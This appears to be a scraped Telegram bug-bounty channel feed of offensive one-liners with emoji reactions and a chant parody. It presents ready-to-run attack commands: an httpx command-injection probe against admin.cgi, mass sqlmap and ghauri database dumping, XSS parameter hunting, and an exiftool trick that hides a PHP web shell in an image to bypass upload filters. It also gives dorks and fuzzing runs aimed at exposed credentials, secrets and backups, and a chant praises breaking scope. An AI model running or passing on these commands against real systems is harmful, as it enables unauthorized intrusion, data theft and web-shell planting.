Search for Sensitive files from Wayback
waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"
π4π₯4
One liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
β€6π₯3
One liner to find sql Injection
#sql
cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
#sql
β€7π4π₯2
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#xss
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss#xss
β€12π2π₯2
XSS from javascript hidden params
#xss
assetfinder target.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
#xss
π₯8β€3π3
Bypass File Upload Filtering
In image:
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
π₯6β€5
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
π₯6
FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving valid ones with a 200 OK response to a text file, ideal for research or web scraping.
https://github.com/shivangmauryaa/FileFetcher.git
https://github.com/shivangmauryaa/FileFetcher.git
GitHub
GitHub - shivangmauryaa/FileFetcher: FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machineβ¦
FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving va...
π5π₯1
Top 25 JavaScript path files used to store sensitive information in Web Application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
π2β€1π₯1
ExploitQuest
Top 25 JavaScript path files used to store sensitive information in Web Application 01. /js/config.js 02. /js/credentials.js 03. /js/secrets.js 04. /js/keys.js 05. /js/password.js 06. /js/api_keys.js 07. /js/auth_tokens.js 08. /js/access_tokens.js 09. /js/sessions.jsβ¦
Dork :
intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")β€4π1
This media is not supported in your browser
VIEW IN TELEGRAM
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
π8π3π«‘3
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
β€9
What does the command do?
Searches for hidden or useful files or paths within the list of links. It is used in security testing to detect sensitive or exposed files on the server.
dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt
π5π₯4β€1
π4π1